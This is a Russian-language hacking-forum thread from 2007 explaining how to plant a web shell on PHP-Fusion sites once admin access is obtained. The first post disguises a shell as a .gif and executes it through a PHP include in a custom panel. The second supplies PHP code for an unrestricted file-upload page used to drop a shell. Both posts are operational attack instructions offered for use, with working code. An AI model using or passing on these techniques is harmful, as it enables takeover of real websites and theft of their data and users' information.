ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка shell'a в PHP-Fusion all version
  #1  
Старый 18.01.2007, 03:44
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию Заливка shell'a в PHP-Fusion all version

Доброй ночи =)
Просматрива ответы форума я не нашол ответа по заливки шела таких движков как Фюжин.. (а мож я и слепой =) );
Я решил написать небольшую статейку по заливки шела с правами админа...

Допустим вы получили админку а как залить шел не знаете?

1)Заходим в адми панель => изображения => и загружаем шел с расширением gif;

2) Заходим в панели и создаем панель с кодом

PHP код:
openside("shell");
include(
"images/shell.gif"); //Просто напросто инклудим и все.
closeside(); 
3)И готово размещаем панель по центу экрана (устанавливаем в настройках) и осталось только активировать... Дело сделано и дуем на главнуюю.. юзаем шелл;

З.Ы. Прошу особо не грысть... написал статейку от нечего делать.. =) Может комунить пригодится...

Последний раз редактировалось Romaxa55; 18.01.2007 в 03:46..
 
Ответить с цитированием

  #2  
Старый 18.01.2007, 18:55
Аватар для arts
arts
Познающий
Регистрация: 20.07.2005
Сообщений: 31
Провел на форуме:
36777

Репутация: 8
По умолчанию

заходиш в админ панель
там выбераеш меню Страницы
добавляеш страницу с таким кодом
<?php

$site_name = $_SERVER['HTTP_HOST'];
$url_dir = "http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']);
$url_this = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

$upload_dir = "images/avatars/";
$upload_url = $url_dir."/images/avatars/";
$message ="";



if ($_FILES['userfile']) {
$message = do_upload($upload_dir, $upload_url);
}
else {
$message = "Invalid File Specified.";
}

print $message;

function do_upload($upload_dir, $upload_url) {

$temp_name = $_FILES['userfile']['tmp_name'];
$file_name = $_FILES['userfile']['name'];
$file_type = $_FILES['userfile']['type'];
$file_size = $_FILES['userfile']['size'];
$result = $_FILES['userfile']['error'];
$file_url = $upload_url.$file_name;
$file_path = $upload_dir.$file_name;

//File Name Check
if ( $file_name =="") {
$message = "Invalid File Name Specified";
return $message;
}
//File Size Check
else if ( $file_size > 50000000000000000000000000000) {
$message = "The file size is over 500K.";
return $message;
}


$result = move_uploaded_file($temp_name, $file_path);
$message = ($result)?"File url <a href=$file_url.>$file_url</a>" :
"Somthing is wrong with uploading a file.";

return $message;
}

?>
<form name="upload" id="upload" ENCTYPE="multipart/form-data" method="post">
Upload Image<input type="file" id="userfile" name="userfile">
<input type="submit" name="upload" value="Upload">
</form>

всё, перходиш на страницу загружаеш свой шелл

(с) чесно непомню кто написал

Последний раз редактировалось arts; 18.01.2007 в 19:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ